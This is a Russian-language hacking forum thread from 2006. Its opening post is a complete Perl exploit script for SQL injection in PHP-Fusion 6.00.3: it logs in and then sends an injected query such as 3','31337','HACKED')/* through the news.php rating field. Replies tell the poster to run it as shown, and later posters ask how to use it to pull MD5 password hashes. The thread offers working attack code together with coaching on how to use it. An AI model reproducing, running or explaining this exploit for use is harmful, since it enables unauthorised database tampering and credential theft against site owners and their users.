Вопрос по использованию сплоита для php-fusion 6.00.3

Romaxa55 · 20 Feb 2006

Парни сорри за ламерство но я уже не знаю что делать, значит вот сам сплоит.

#!/usr/bin/perl
#Exploit for PHP-Fusion 6.00.3 Released
#Coded by:krasza[[email protected]]
#Greetz: http://www.securityreason.com
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
if(!$ARGV[3]){
print<<EOF;
Exploit for PHP-Fusion 6.00.3 Released
Coded by krasza
Contact me:krasza\@gmail.com
Greets:
-http://www.securityreason.com
-http://www.revival.pl
-mulander

Usage:
perl phpfusion.pl url login pass sql
url-url hack site with [php fusion's directory]
login-your login
pass-your password
sql-[sql code]
Example:
\t perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
EOF
exit;
}
my $url=shift;
my $login=shift;
my $haslo=shift;
my $sql=shift;
$url=$url."/news.php?readmore=1";
my $ua = new LWP::UserAgent;
$ua->agent("Exploit for PHP-Fusion" . $ua->agent);
$ua->cookie_jar( HTTP::Cookies->new('file' => 'ciasteczka.txt','autosave' => 1,));
print "[+]Connecting to $url...\n";

my $zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('user_name=' . $login . '&user_pass=' . $haslo . '&login=Loguj');
my $wynik = $ua->request($zadanie);
if ($wynik->is_success){
print "[+]Connected to $url\n";
#LOGIN JEST PRAWIDLOWE
}else{
print "[-]Connected failed to $url\n";
print "[-]Error:".$wynik->message."\n";
exit;
}
print "[+] Logging In $url...\n";
$zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('rating='.$sql.'&post_rating=Dodaj+ocen%EA');
my $wynik2 = $ua->request($zadanie);
if ($wynik2->is_success){
print "[+] Sql query isn't done!\n";
}else{
print "[-]Sql query is done\n";
}
Click to expand...

Но никак не пойму что именно вводить.
perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/* смущают последние строчки. Подскажите кто знает.

Inferno · 20 Feb 2006

А что там смущает если там написано Example:
шо значит пример!

k1b0rg · 20 Feb 2006

perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
Click to expand...

все правильно, он работает со скулей, все норма, так что вводи как показано в примере

Romaxa55 · 20 Feb 2006

Спасиб Киборк что понял меня правильно, сейчас опробую и вывешу результат и тему можно будет закрывать

Mina · 21 May 2006

A што дальше?
Code:
[-]Sql query is done

Zitt · 21 May 2006

DimaHbl4 ну что может сплойт делать или позволяет выполнять команды или лог\пасс\хеш выдаёт

Susel · 6 Jun 2006

Помогите.... Этот эксплоит приведённый выше, что делает.....добывает хеш??? Если да то, где он его сохраняет... После выполнения появляется файл тип лога, но там ни хрена нет... Help Please!!! )))

netadmin · 7 Aug 2006

a kntonibud znait kakuiu sql query nada dla etava vipolnit shtob dastat md5 pwd

Вопрос по использованию сплоита для php-fusion 6.00.3

Romaxa55 Banned

Inferno Elder - Старейшина

k1b0rg Тут может быть ваша реклама.

Romaxa55 Banned

Mina New Member

Zitt Elder - Старейшина

Susel New Member

netadmin New Member

Вопрос по шеллу

Вопрос про nmap ssh-hostkey

Вопрос по движку UMI.CMS

Useful Searches

Вопрос по использованию сплоита для php-fusion 6.00.3

Romaxa55 Banned

Inferno Elder - Старейшина

k1b0rg Тут может быть ваша реклама.

Romaxa55 Banned

Mina New Member

Zitt Elder - Старейшина

Susel New Member

netadmin New Member

Вопрос по шеллу

Вопрос про nmap ssh-hostkey

Вопрос по движку UMI.CMS